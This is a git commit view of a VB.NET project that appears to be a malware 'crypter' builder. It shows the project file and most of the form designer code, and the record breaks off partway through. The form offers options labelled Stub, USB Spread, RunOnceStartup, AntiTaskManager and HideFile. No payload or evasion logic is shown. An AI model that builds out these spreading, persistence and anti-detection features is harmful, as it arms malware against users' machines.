initial commit

This commit is contained in:
i2p
2026-08-27 11:04:21 -06:00
commit 07a49a8c50
937 changed files with 196477 additions and 0 deletions
BIN
View File
Binary file not shown.
@@ -0,0 +1,133 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BC1DA833-098D-4E25-B323-1A507728D320}</ProjectGuid>
<OutputType>WinExe</OutputType>
<StartupObject>Builder_Crypter__By___ıllıllıMя.HackeяsDzıllıllı_.My.MyApplication</StartupObject>
<RootNamespace>Builder_Crypter__By___ıllıllıMя.HackeяsDzıllıllı_</RootNamespace>
<AssemblyName>Builder Crypter By [ıllıllıMя.HackeяsDzıllıllı]</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>WindowsForms</MyType>
<TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>bin\Debug\</OutputPath>
<DocumentationFile>Builder Crypter By [ıllıllıMя.HackeяsDzıllıllı].xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>Builder Crypter By [ıllıllıMя.HackeяsDzıllıllı].xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
</PropertyGroup>
<PropertyGroup>
<OptionExplicit>On</OptionExplicit>
</PropertyGroup>
<PropertyGroup>
<OptionCompare>Binary</OptionCompare>
</PropertyGroup>
<PropertyGroup>
<OptionStrict>Off</OptionStrict>
</PropertyGroup>
<PropertyGroup>
<OptionInfer>On</OptionInfer>
</PropertyGroup>
<PropertyGroup>
<ApplicationIcon>3xhumed-Mega-Games-Pack-31-Dragon-Age-Origins-new-4.ico</ApplicationIcon>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Drawing" />
<Import Include="System.Diagnostics" />
<Import Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.vb">
<SubType>Form</SubType>
</Compile>
<Compile Include="Form1.Designer.vb">
<DependentUpon>Form1.vb</DependentUpon>
<SubType>Form</SubType>
</Compile>
<Compile Include="Module1.vb">
<SubType>Component</SubType>
</Compile>
<Compile Include="Module2.vb">
<SubType>Component</SubType>
</Compile>
<Compile Include="Module3.vb" />
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
</Compile>
<Compile Include="My Project\Resources.Designer.vb">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="My Project\Settings.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx">
<DependentUpon>Form1.vb</DependentUpon>
</EmbeddedResource>
<EmbeddedResource Include="My Project\Resources.resx">
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
<CustomToolNamespace>My.Resources</CustomToolNamespace>
<SubType>Designer</SubType>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
<None Include="My Project\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<CustomToolNamespace>My</CustomToolNamespace>
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
</None>
</ItemGroup>
<ItemGroup>
<Content Include="3xhumed-Mega-Games-Pack-31-Dragon-Age-Origins-new-4.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>
@@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ProjectView>ProjectFiles</ProjectView>
</PropertyGroup>
</Project>
@@ -0,0 +1,423 @@
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
Partial Class Form1
Inherits System.Windows.Forms.Form
'Form overrides dispose to clean up the component list.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Required by the Windows Form Designer
Private components As System.ComponentModel.IContainer
'NOTE: The following procedure is required by the Windows Form Designer
'It can be modified using the Windows Form Designer.
'Do not modify it using the code editor.
<System.Diagnostics.DebuggerStepThrough()> _
Private Sub InitializeComponent()
Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(Form1))
Me.StTheme1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STTheme()
Me.PictureBox1 = New System.Windows.Forms.PictureBox()
Me.LogInProgressBar1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInProgressBar()
Me.StControlButton2 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton()
Me.StControlButton1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton()
Me.LogInNormalTextBox2 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox()
Me.LogInNormalTextBox1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox()
Me.StButton4 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton()
Me.LogInGroupBox2 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInGroupBox()
Me.StCheckBox5 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox()
Me.StCheckBox4 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox()
Me.StCheckBox3 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox()
Me.StCheckBox2 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox()
Me.StCheckBox1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox()
Me.StButton3 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton()
Me.StButton2 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton()
Me.StButton1 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STButton()
Me.LogInNormalTextBox3 = New Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox()
Me.StTheme1.SuspendLayout()
CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit()
Me.LogInGroupBox2.SuspendLayout()
Me.SuspendLayout()
'
'StTheme1
'
Me.StTheme1.BackColor = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.StTheme1.BorderStyle = System.Windows.Forms.FormBorderStyle.None
Me.StTheme1.Controls.Add(Me.PictureBox1)
Me.StTheme1.Controls.Add(Me.LogInProgressBar1)
Me.StTheme1.Controls.Add(Me.StControlButton2)
Me.StTheme1.Controls.Add(Me.StControlButton1)
Me.StTheme1.Controls.Add(Me.LogInNormalTextBox2)
Me.StTheme1.Controls.Add(Me.LogInNormalTextBox1)
Me.StTheme1.Controls.Add(Me.StButton4)
Me.StTheme1.Controls.Add(Me.LogInGroupBox2)
Me.StTheme1.Controls.Add(Me.StButton3)
Me.StTheme1.Controls.Add(Me.StButton2)
Me.StTheme1.Controls.Add(Me.StButton1)
Me.StTheme1.Controls.Add(Me.LogInNormalTextBox3)
Me.StTheme1.Font = New System.Drawing.Font("Times New Roman", 9.75!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StTheme1.Name = "StTheme1"
Me.StTheme1.Radius = 5
Me.StTheme1.Size = New System.Drawing.Size(415, 502)
Me.StTheme1.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen
Me.StTheme1.Title = " Dragon Crypter By [ıllıllıMя.HackeяsDzıllıllı]"
Me.StTheme1.TitleColorBack = System.Drawing.Color.Black
Me.StTheme1.TitleColorFront = System.Drawing.Color.White
Me.StTheme1.TopMost = False
Me.StTheme1.TransparencyKey = System.Drawing.Color.Magenta
'
'PictureBox1
'
Me.PictureBox1.Image = CType(resources.GetObject("PictureBox1.Image"), System.Drawing.Image)
Me.PictureBox1.Location = New System.Drawing.Point(12, 32)
Me.PictureBox1.Name = "PictureBox1"
Me.PictureBox1.Size = New System.Drawing.Size(391, 114)
Me.PictureBox1.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage
Me.PictureBox1.TabIndex = 19
Me.PictureBox1.TabStop = False
'
'LogInProgressBar1
'
Me.LogInProgressBar1.BaseColour = System.Drawing.Color.FromArgb(CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer))
Me.LogInProgressBar1.BorderColour = System.Drawing.Color.FromArgb(CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer))
Me.LogInProgressBar1.FontColour = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.LogInProgressBar1.Location = New System.Drawing.Point(12, 465)
Me.LogInProgressBar1.Maximum = 100
Me.LogInProgressBar1.Name = "LogInProgressBar1"
Me.LogInProgressBar1.ProgressColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(160, Byte), Integer), CType(CType(199, Byte), Integer))
Me.LogInProgressBar1.SecondColour = System.Drawing.Color.FromArgb(CType(CType(0, Byte), Integer), CType(CType(145, Byte), Integer), CType(CType(184, Byte), Integer))
Me.LogInProgressBar1.Size = New System.Drawing.Size(376, 25)
Me.LogInProgressBar1.TabIndex = 16
Me.LogInProgressBar1.Text = "LogInProgressBar1"
Me.LogInProgressBar1.TwoColour = True
Me.LogInProgressBar1.Value = 0
'
'StControlButton2
'
Me.StControlButton2.Anchor = CType((System.Windows.Forms.AnchorStyles.Top Or System.Windows.Forms.AnchorStyles.Right), System.Windows.Forms.AnchorStyles)
Me.StControlButton2.ControlButton = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton.Button.Minimize
Me.StControlButton2.Location = New System.Drawing.Point(379, 0)
Me.StControlButton2.Margin = New System.Windows.Forms.Padding(0)
Me.StControlButton2.Name = "StControlButton2"
Me.StControlButton2.Size = New System.Drawing.Size(18, 20)
Me.StControlButton2.Text = "StControlButton2"
'
'StControlButton1
'
Me.StControlButton1.Anchor = CType((System.Windows.Forms.AnchorStyles.Top Or System.Windows.Forms.AnchorStyles.Right), System.Windows.Forms.AnchorStyles)
Me.StControlButton1.ControlButton = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STControlButton.Button.Close
Me.StControlButton1.Location = New System.Drawing.Point(397, 0)
Me.StControlButton1.Margin = New System.Windows.Forms.Padding(0)
Me.StControlButton1.Name = "StControlButton1"
Me.StControlButton1.Size = New System.Drawing.Size(18, 20)
Me.StControlButton1.Text = "StControlButton1"
'
'LogInNormalTextBox2
'
Me.LogInNormalTextBox2.BackColor = System.Drawing.Color.Transparent
Me.LogInNormalTextBox2.BackgroundColour = System.Drawing.Color.FromArgb(CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer))
Me.LogInNormalTextBox2.BorderColour = System.Drawing.Color.FromArgb(CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer))
Me.LogInNormalTextBox2.Location = New System.Drawing.Point(12, 161)
Me.LogInNormalTextBox2.MaxLength = 32767
Me.LogInNormalTextBox2.Multiline = False
Me.LogInNormalTextBox2.Name = "LogInNormalTextBox2"
Me.LogInNormalTextBox2.ReadOnly = False
Me.LogInNormalTextBox2.Size = New System.Drawing.Size(286, 29)
Me.LogInNormalTextBox2.Style = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox.Styles.NotRounded
Me.LogInNormalTextBox2.TabIndex = 12
Me.LogInNormalTextBox2.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
Me.LogInNormalTextBox2.TextColour = System.Drawing.Color.Lime
Me.LogInNormalTextBox2.UseSystemPasswordChar = False
'
'LogInNormalTextBox1
'
Me.LogInNormalTextBox1.BackColor = System.Drawing.Color.Transparent
Me.LogInNormalTextBox1.BackgroundColour = System.Drawing.Color.FromArgb(CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer))
Me.LogInNormalTextBox1.BorderColour = System.Drawing.Color.FromArgb(CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer))
Me.LogInNormalTextBox1.Location = New System.Drawing.Point(12, 208)
Me.LogInNormalTextBox1.MaxLength = 32767
Me.LogInNormalTextBox1.Multiline = False
Me.LogInNormalTextBox1.Name = "LogInNormalTextBox1"
Me.LogInNormalTextBox1.ReadOnly = False
Me.LogInNormalTextBox1.Size = New System.Drawing.Size(286, 29)
Me.LogInNormalTextBox1.Style = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.LogInNormalTextBox.Styles.NotRounded
Me.LogInNormalTextBox1.TabIndex = 11
Me.LogInNormalTextBox1.TextAlign = System.Windows.Forms.HorizontalAlignment.Left
Me.LogInNormalTextBox1.TextColour = System.Drawing.Color.Lime
Me.LogInNormalTextBox1.UseSystemPasswordChar = False
'
'StButton4
'
Me.StButton4.BackColorBottom = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton4.BackColorTop = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton4.DisabledBottomColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton4.DisabledTopColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton4.Font = New System.Drawing.Font("Times New Roman", 15.75!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StButton4.HorizontalTextAlign = System.Drawing.StringAlignment.Center
Me.StButton4.HoverBackColor = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton4.HoverColor = System.Drawing.Color.FromArgb(CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer))
Me.StButton4.Location = New System.Drawing.Point(63, 422)
Me.StButton4.MinimumSize = New System.Drawing.Size(15, 15)
Me.StButton4.Name = "StButton4"
Me.StButton4.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton4.OutlineThickness = 1
Me.StButton4.PressedBottomColor = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.StButton4.PressedTopColor = System.Drawing.Color.FromArgb(CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer))
Me.StButton4.Radius = 3
Me.StButton4.Size = New System.Drawing.Size(266, 37)
Me.StButton4.TabIndex = 8
Me.StButton4.Text = "Protect"
Me.StButton4.TextBackColor = System.Drawing.Color.Black
Me.StButton4.TextColor = System.Drawing.Color.White
Me.StButton4.VerticalTextAlign = System.Drawing.StringAlignment.Center
'
'LogInGroupBox2
'
Me.LogInGroupBox2.BorderColour = System.Drawing.Color.FromArgb(CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer), CType(CType(35, Byte), Integer))
Me.LogInGroupBox2.Controls.Add(Me.StCheckBox5)
Me.LogInGroupBox2.Controls.Add(Me.StCheckBox4)
Me.LogInGroupBox2.Controls.Add(Me.StCheckBox3)
Me.LogInGroupBox2.Controls.Add(Me.StCheckBox2)
Me.LogInGroupBox2.Controls.Add(Me.StCheckBox1)
Me.LogInGroupBox2.Font = New System.Drawing.Font("Times New Roman", 12.0!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.LogInGroupBox2.HeaderColour = System.Drawing.Color.FromArgb(CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer), CType(CType(42, Byte), Integer))
Me.LogInGroupBox2.Location = New System.Drawing.Point(12, 297)
Me.LogInGroupBox2.MainColour = System.Drawing.Color.FromArgb(CType(CType(47, Byte), Integer), CType(CType(47, Byte), Integer), CType(CType(47, Byte), Integer))
Me.LogInGroupBox2.Name = "LogInGroupBox2"
Me.LogInGroupBox2.Size = New System.Drawing.Size(385, 119)
Me.LogInGroupBox2.TabIndex = 7
Me.LogInGroupBox2.Text = "Settings"
Me.LogInGroupBox2.TextColour = System.Drawing.Color.FromArgb(CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer), CType(CType(255, Byte), Integer))
'
'StCheckBox5
'
Me.StCheckBox5.BackColorBottom = System.Drawing.Color.Empty
Me.StCheckBox5.BackColorTop = System.Drawing.Color.Empty
Me.StCheckBox5.BorderThickness = 2
Me.StCheckBox5.Checked = False
Me.StCheckBox5.CheckedColor = System.Drawing.Color.Lime
Me.StCheckBox5.CheckedColorBack = System.Drawing.Color.Black
Me.StCheckBox5.CheckedType = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox.CheckedTypes.Blop
Me.StCheckBox5.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StCheckBox5.Location = New System.Drawing.Point(267, 33)
Me.StCheckBox5.Name = "StCheckBox5"
Me.StCheckBox5.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StCheckBox5.Size = New System.Drawing.Size(109, 23)
Me.StCheckBox5.TabIndex = 34
Me.StCheckBox5.Text = "USB Spread"
Me.StCheckBox5.TextColor = System.Drawing.Color.White
Me.StCheckBox5.TextColorBack = System.Drawing.Color.Black
'
'StCheckBox4
'
Me.StCheckBox4.BackColorBottom = System.Drawing.Color.Empty
Me.StCheckBox4.BackColorTop = System.Drawing.Color.Empty
Me.StCheckBox4.BorderThickness = 2
Me.StCheckBox4.Checked = False
Me.StCheckBox4.CheckedColor = System.Drawing.Color.Lime
Me.StCheckBox4.CheckedColorBack = System.Drawing.Color.Black
Me.StCheckBox4.CheckedType = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox.CheckedTypes.Blop
Me.StCheckBox4.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StCheckBox4.Location = New System.Drawing.Point(267, 83)
Me.StCheckBox4.Name = "StCheckBox4"
Me.StCheckBox4.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StCheckBox4.Size = New System.Drawing.Size(85, 23)
Me.StCheckBox4.TabIndex = 33
Me.StCheckBox4.Text = "HideFile"
Me.StCheckBox4.TextColor = System.Drawing.Color.White
Me.StCheckBox4.TextColorBack = System.Drawing.Color.Black
'
'StCheckBox3
'
Me.StCheckBox3.BackColorBottom = System.Drawing.Color.Empty
Me.StCheckBox3.BackColorTop = System.Drawing.Color.Empty
Me.StCheckBox3.BorderThickness = 2
Me.StCheckBox3.Checked = False
Me.StCheckBox3.CheckedColor = System.Drawing.Color.Lime
Me.StCheckBox3.CheckedColorBack = System.Drawing.Color.Black
Me.StCheckBox3.CheckedType = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox.CheckedTypes.Blop
Me.StCheckBox3.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StCheckBox3.Location = New System.Drawing.Point(109, 33)
Me.StCheckBox3.Name = "StCheckBox3"
Me.StCheckBox3.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StCheckBox3.Size = New System.Drawing.Size(141, 23)
Me.StCheckBox3.TabIndex = 32
Me.StCheckBox3.Text = "RunOnceStartup"
Me.StCheckBox3.TextColor = System.Drawing.Color.White
Me.StCheckBox3.TextColorBack = System.Drawing.Color.Black
'
'StCheckBox2
'
Me.StCheckBox2.BackColorBottom = System.Drawing.Color.Empty
Me.StCheckBox2.BackColorTop = System.Drawing.Color.Empty
Me.StCheckBox2.BorderThickness = 2
Me.StCheckBox2.Checked = False
Me.StCheckBox2.CheckedColor = System.Drawing.Color.Lime
Me.StCheckBox2.CheckedColorBack = System.Drawing.Color.Black
Me.StCheckBox2.CheckedType = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox.CheckedTypes.Blop
Me.StCheckBox2.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StCheckBox2.Location = New System.Drawing.Point(3, 83)
Me.StCheckBox2.Name = "StCheckBox2"
Me.StCheckBox2.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StCheckBox2.Size = New System.Drawing.Size(150, 23)
Me.StCheckBox2.TabIndex = 31
Me.StCheckBox2.Text = "AntiTaskManager"
Me.StCheckBox2.TextColor = System.Drawing.Color.White
Me.StCheckBox2.TextColorBack = System.Drawing.Color.Black
'
'StCheckBox1
'
Me.StCheckBox1.BackColorBottom = System.Drawing.Color.Empty
Me.StCheckBox1.BackColorTop = System.Drawing.Color.Empty
Me.StCheckBox1.BorderThickness = 2
Me.StCheckBox1.Checked = False
Me.StCheckBox1.CheckedColor = System.Drawing.Color.Lime
Me.StCheckBox1.CheckedColorBack = System.Drawing.Color.Black
Me.StCheckBox1.CheckedType = Builder_Crypter__By___ıllıllı.HackeяsDzıllıllı_.STCheckBox.CheckedTypes.Blop
Me.StCheckBox1.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StCheckBox1.Location = New System.Drawing.Point(3, 33)
Me.StCheckBox1.Name = "StCheckBox1"
Me.StCheckBox1.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StCheckBox1.Size = New System.Drawing.Size(63, 23)
Me.StCheckBox1.TabIndex = 30
Me.StCheckBox1.Text = "Sleep"
Me.StCheckBox1.TextColor = System.Drawing.Color.White
Me.StCheckBox1.TextColorBack = System.Drawing.Color.Black
'
'StButton3
'
Me.StButton3.BackColorBottom = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton3.BackColorTop = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton3.DisabledBottomColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton3.DisabledTopColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton3.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StButton3.HorizontalTextAlign = System.Drawing.StringAlignment.Center
Me.StButton3.HoverBackColor = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton3.HoverColor = System.Drawing.Color.FromArgb(CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer))
Me.StButton3.Location = New System.Drawing.Point(316, 252)
Me.StButton3.MinimumSize = New System.Drawing.Size(15, 15)
Me.StButton3.Name = "StButton3"
Me.StButton3.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton3.OutlineThickness = 1
Me.StButton3.PressedBottomColor = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.StButton3.PressedTopColor = System.Drawing.Color.FromArgb(CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer))
Me.StButton3.Radius = 3
Me.StButton3.Size = New System.Drawing.Size(87, 29)
Me.StButton3.TabIndex = 5
Me.StButton3.Text = "Generate"
Me.StButton3.TextBackColor = System.Drawing.Color.Black
Me.StButton3.TextColor = System.Drawing.Color.White
Me.StButton3.VerticalTextAlign = System.Drawing.StringAlignment.Center
'
'StButton2
'
Me.StButton2.BackColorBottom = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton2.BackColorTop = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton2.DisabledBottomColor = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
Me.StButton2.DisabledTopColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton2.Font = New System.Drawing.Font("Times New Roman", 11.25!, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, CType(0, Byte))
Me.StButton2.HorizontalTextAlign = System.Drawing.StringAlignment.Center
Me.StButton2.HoverBackColor = System.Drawing.Color.FromArgb(CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer), CType(CType(60, Byte), Integer))
Me.StButton2.HoverColor = System.Drawing.Color.FromArgb(CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer), CType(CType(80, Byte), Integer))
Me.StButton2.Location = New System.Drawing.Point(316, 208)
Me.StButton2.MinimumSize = New System.Drawing.Size(15, 15)
Me.StButton2.Name = "StButton2"
Me.StButton2.OutlineColor = System.Drawing.Color.FromArgb(CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer), CType(CType(30, Byte), Integer))
Me.StButton2.OutlineThickness = 1
Me.StButton2.PressedBottomColor = System.Drawing.Color.FromArgb(CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer), CType(CType(50, Byte), Integer))
Me.StButton2.PressedTopColor = System.Drawing.Color.FromArgb(CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer), CType(CType(70, Byte), Integer))
Me.StButton2.Radius = 3
Me.StButton2.Size = New System.Drawing.Size(87, 29)
Me.StButton2.TabIndex = 4
Me.StButton2.Text = "Stub"
Me.StButton2.TextBackColor = System.Drawing.Color.Black
Me.StButton2.TextColor = System.Drawing.Color.White
Me.StButton2.VerticalTextAlign = System.Drawing.StringAlignment.Center
'
'StButton1
'
Me.StButton1.BackColorBottom = System.Drawing.Color.FromArgb(CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer), CType(CType(40, Byte), Integer))
